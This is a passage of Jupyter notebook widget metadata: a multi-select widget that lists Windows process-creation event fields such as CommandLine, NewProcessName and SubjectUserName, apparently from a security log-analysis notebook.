"1.5.0", "model_name": "SelectMultipleModel", "state": { "_options_labels": [ "Account", "CommandLine", "Computer", "EventID", "NewProcessId", "NewProcessName", "ParentProcessName", "ProcessId", "SourceComputerId", "SubjectDomainName", "SubjectLogonId", "SubjectUserName", "SubjectUserSid", "TargetLogonId", "TenantId", "TimeCreatedUtc", "TimeGenerated", "TokenElevationType" ], "description": "Source: ", "index": [], "layout": "IPY_MODEL_6ff46ca9038444fb8984abd8082103fc", "rows": 5, "style": "IPY_MODEL_983445971b1748fa8e34c852d9c0ff1e" } }, "ffeb4d532469440bb9baa845061a1bf3": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} } }, "version_major": 2, "version_minor": 0 } } }, "nbformat": 4, "nbformat_minor": 4 }